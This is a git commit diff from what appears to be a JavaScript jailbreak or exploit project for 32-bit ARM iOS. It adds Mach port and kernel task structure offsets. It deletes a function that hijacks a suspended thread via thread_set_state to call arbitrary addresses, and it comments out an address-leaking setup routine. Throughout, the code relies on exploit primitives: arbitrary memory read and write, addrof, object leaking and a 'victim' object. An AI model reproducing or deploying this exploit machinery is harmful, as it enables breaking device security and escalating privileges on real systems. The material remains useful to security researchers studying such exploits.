fix my own incompetence

3 files changed, 36 insertions, 97 deletions

diff --git a/src/js/main.js b/src/js/main.js
index e077fbe..ec7e814 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -18,6 +18,9 @@ var PROT_EXEC = 0x4;
 
 var MAP_PRIVATE = 0x2;
 var MAP_ANON = 0x1000;
+var RTLD_NOW = 2;
+var PAGE_SIZE = 0x1000;
+var O_RDONLY = 0;
 
 var victim = {a: 13.37};
 
@@ -33,7 +36,7 @@ if (0) {
 		 */
 
 		puts = function (){};
-}
+	}
 }
 
 var JSStringCreateWithUTF8CString = 0x239f9d0d;
@@ -47,6 +50,35 @@ var kCFPreferencesCurrentHost;
 var kIOMasterPortDefault = NULL;
 var options = {};
 
+var sanity_port = 0;
+var MACH_PORT_RIGHT_RECEIVE = 0x1;
+var MACH_MSG_TYPE_MAKE_SEND = 0x14;
+var MACH_PORT_LIMITS_INFO = 0x1;
+var MACH_PORT_LIMITS_INFO_COUNT = 0x1;
+var kport_size = 0x78;
+var kport_ip_bits4 = 0x0;
+var kport_ip_references4 = 0x4;
+var kport_ip_lock_type4 = 0x10;
+var kport_ip_messages_port_qlimit2 = 0x42;
+var kport_ip_receiver4 = 0x4c;
+var kport_ip_srights4 = 0x70;
+var KERN_SUCCESS = 0;
+var NULL = 0;
+var MACH_PORT_NULL = 0;
+var req_init_port_set = 0x1c;
+var req_head_msgh_bits = 0x0;
+var req_head_msgh_request_port = 0x8;
+var req_head_msgh_reply_port = 0xc;
+var req_head_msgh_id = 0x14;
+var req_msgh_body_msgh_descriptor_count = 0x18;
+var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x2;
+var req_init_port_set_address = 0x0;
+var req_init_port_set_count = 0x4;
+var MACH_RCV_MSG = 0x2;
+var MACH_MSG_TIMEOUT_NONE = 0;
+var TASK_BSDINFO_OFFSET = 0x200;
+var BSDINFO_PID_OFFSET = 0x8;
+
 function parse_nvram_options() {
 //	read_u32(dlsym(dlopen("/System/Library/Frameworks/IOKit.framework/IOKit", RTLD_NOW), "kIOMasterPortDefault"));
 	var kIOMasterPortDefault_ptr = shit_heap(4)
@@ -98,7 +130,7 @@ function main() {
 	sym_cache["JSObjectGetProperty"] = JSObjectGetProperty + dyld_shc_slide;
 	sym_cache["JSContextGetGlobalObject"] = JSContextGetGlobalObject + dyld_shc_slide;
 
-	prep_shit();
+//	prep_shit();
 
 	setup_fancy_rw();
 
diff --git a/src/js/primitives/call.js b/src/js/primitives/call.js
index a581c91..74a20d8 100644
--- a/src/js/primitives/call.js
+++ b/src/js/primitives/call.js
@@ -158,100 +158,6 @@ function symaddr(sym) {
 	return addy;
 }
 
-function callnarg_new() {
-	if (arguments.length < 1) {
-		return printf("error: tried to run callnarg without args. arguments.length=%d\n", arguments.length);
-	}
-
-	var stack_shit = 0x161000;
-
-	/*
-	 *  setup ptrs
-	 */
-	write_u32(countptr, count);
-	write_u32(thptr, th);
-	write_u32(threadptr, thread);
-	write_u32(thread_stateptr, thread_state);
-
-	write_u32(countptrptr, countptr);
-	write_u32(thptrptr, thptr);
-	write_u32(threadptrptr, threadptr);
-	write_u32(thread_stateptrptr, thread_stateptr);	
-
-	var addy = arguments[0];
-	var dyld_shc_slide = get_dyld_shc_slide();
-
-	/*
-	 *  make __stack_chk_fail infinite loop
-	 *  (works by setting its lazy addy to its resolver, thus the resolver just
-	 *   endlessly jumps to iself)
-	 */
-	write_u32(__stack_chk_fail_lazy_addy + dyld_shc_slide, __stack_chk_fail_resolver + dyld_shc_slide);
-
-	/*
-	 *  if the thread doesn't exist, create it.
-	 */
-	calls4arg("pthread_create", threadptr, 0, __stack_chk_fail_resolver + dyld_shc_slide, 0);
-	thread = read_u32(threadptr);
-	write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0));
-	rth = read_u32(th);
-	calls4arg("thread_suspend", rth, 0, 0, 0);
-
-	if (pthread_ret == 0) {
-		pthread_ret = malloc(4);
-	}
-
-	/*
-	 *  write first 4 to r0-r3, rest to stack
-	 */
-	for (var i = 1; i < arguments.length; i++) {
-		if (i <= 4) {
-			write_u32(thread_state + ((i - 1) << 2), arguments[i]);
-		} else {
-			write_u32(stack_shit + ((i - 5) << 2), arguments[i]);
-		}
-	}
-
-	var stack_shit_ret_offset = 0x58;
-
-	write_u32(stack_shit + stack_shit_ret_offset, pthread_exit + dyld_shc_slide);
-
-	/*
-	 *  stack
-	 */
-	write_u32(thread_state + (13 << 2), stack_shit);
-
-	/*
-	 *  return address, infinite loop
-	 */
-	write_u32(thread_state + (14 << 2), add_sp_0x3c + dyld_shc_slide);
-
-	/*
-	 *  pc
-	 */
-	write_u32(thread_state + (15 << 2), addy);
-
-	/*
-	 *  cpsr, magic
-	 */
-	if (addy & 1) {
-		write_u32(thread_state + (16 << 2), 0x40000020);
-	} else {
-		write_u32(thread_state + (16 << 2), 0x40000000);
-	}
-
-	/*
-	 *  set the state
-	 */
-	calls4arg("thread_set_state", rth, ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT);
-	calls4arg("thread_resume", rth, 0, 0, 0);
-
-	calls4arg("pthread_join", thread, pthread_ret, 0, 0);
-	write_u32(count, 17);
-	calls4arg("thread_get_state", rth, ARM_THREAD_STATE, thread_state, count);
-	return read_u32(pthread_ret);
-}
-
 function callnarg() {
 	if (arguments.length < 1) {
 		return printf("error: tried to run callnarg without args. arguments.length=%d\n", arguments.length);
diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js
index 0c03090..d664e7b 100644
--- a/src/js/primitives/mem.js
+++ b/src/js/primitives/mem.js
@@ -308,12 +308,13 @@ var jsobj_addr;
 var large_buf = new Uint32Array(0x100000);
 var large_buf_ptr = 0;
 
+/*
 function prep_shit() {
 	string_ref = scall("JSStringCreateWithUTF8CString", "victim");
 	global_object = scall("JSContextGetGlobalObject", read_u32(slid + reserve_addr + 0x44));
 	jsobj_addr = scall("JSObjectGetProperty", read_u32(slid + reserve_addr + 0x44), global_object, string_ref, NULL);
 	large_buf_ptr = leak_vec(large_buf);
-}
+}*/
 
 function addrof(obj) {
 	victim.target = obj;